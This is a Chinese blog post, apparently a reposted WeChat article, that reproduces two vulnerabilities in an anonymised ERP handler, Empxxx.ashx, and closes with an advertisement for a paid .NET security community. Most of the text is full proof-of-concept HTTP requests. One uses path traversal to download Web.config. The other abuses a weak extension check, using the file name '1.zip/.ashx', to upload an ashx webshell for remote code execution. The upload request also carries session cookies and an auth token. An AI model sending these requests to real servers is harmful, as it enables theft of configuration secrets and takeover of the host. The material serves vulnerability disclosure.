.NET 复现某应用接口文件下载和上传漏洞
2024-1-15 08:37:27 Author: dotNet安全矩阵(查看原文) 阅读量:20 收藏

01

文件读取漏洞

来自.NET安全矩阵星球某位师傅的投稿,某ERP应用Empxxx.ashx文件存在任意文件遍历下载漏洞,其中参数 downloadfile 和 filename 的值包含了路径信息,存在路径遍历漏洞../../

POST /ashx/Empxxxx.ashx HTTP/1.1Host: xxx:8000Content-Length: 99Accept: application/json, text/plain, */*request-id: 1696685307364User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedOrigin: http://xxx.com:8000Referer: http://xxx.com:8000/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
downloadfile=../../version.txt&Logcs=fe36e5dbe29c243c4c5d786ef7755eab&ztid=1&filename=../Web.config

在请求体中,downloadfile字段指定了文件下载的相对路径,其中包含../../version.txt,而filename字段则包含了../Web.config,可能使攻击者能够越过应用程序的目录边界,访问敏感文件或执行未经授权的操作。

02

文件上传漏洞

某ERP应用Empxxx.ashx 该文件还存在任意文件上传漏洞,其中参数 upfilename后缀校验不严格,导致可以上传.ashx扩展名,实现远程RCE漏洞

POST /ashx/Empxxx.ashx HTTP/1.1Host: localhost:8022User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101Firefox/115.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Hm_lvt_3da287eaa11ba6b87653f5a126ef49fb=1690202534;.ASPXAUTH=4F7E67811CE8949B33F361D4A1FDD2B401BA2CE6489717C3A80309E510029DC987ED08FF84A45F58D09C61C41C30E9F9D993960813BE2FDD95A0CB7C3434535EBEFB28DD2046B209C0B5E34746F6B8902A2093EC665B7C725FD7BCAA6EC2C1A6280F785B37F56BAEB381B1DE;ASP.NET_SessionId=kj2lsheqcdtjlww0nucbjtsr;__utma=1.981275669.1695053774.1695053774.1695053774.1; __utmc=1;__utmz=1.1695053774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);__AntiXsrfToken=3e7b51836f4e489a993f73f4284b1c92Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Content-Type: multipart/form-data; boundary=--------1267930054Content-Length: 5460----------1267930054Content-Disposition: form-data; name="Logcs"fe36e5dbe29c243c4c5d786ef7755eab----------1267930054Content-Disposition: form-data; name="file";filename="1.zip/.ashx"xxxxxxxxxxxxxxxxxxxxxxxx----------1267930054Content-Disposition: form-data; name="upfilename"1.ashx/.txt----------1267930054

这个HTTP POST请求是通过multipart/form-data格式发送的,用于向服务器上传文件以及其他表单数据。

请求中指定file字段中的文件名为1.zip/.ashx,实现写入ashx WebShell。

03

欢迎加入我们的知识库

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。经过运营团队成员商议一致同意给到师傅们最大优惠力度,只需199元就可以加入我们。

    目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

    星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

    我们还有一个会员专属的星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。


文章来源: http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247490352&idx=1&sn=7843c6bf98107daac41f89f8534cbcc5&chksm=fb8f9bab49ae73ff53abeec1f94a22a16c8e9eece4501e974110554d5676de6905e6603694df&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh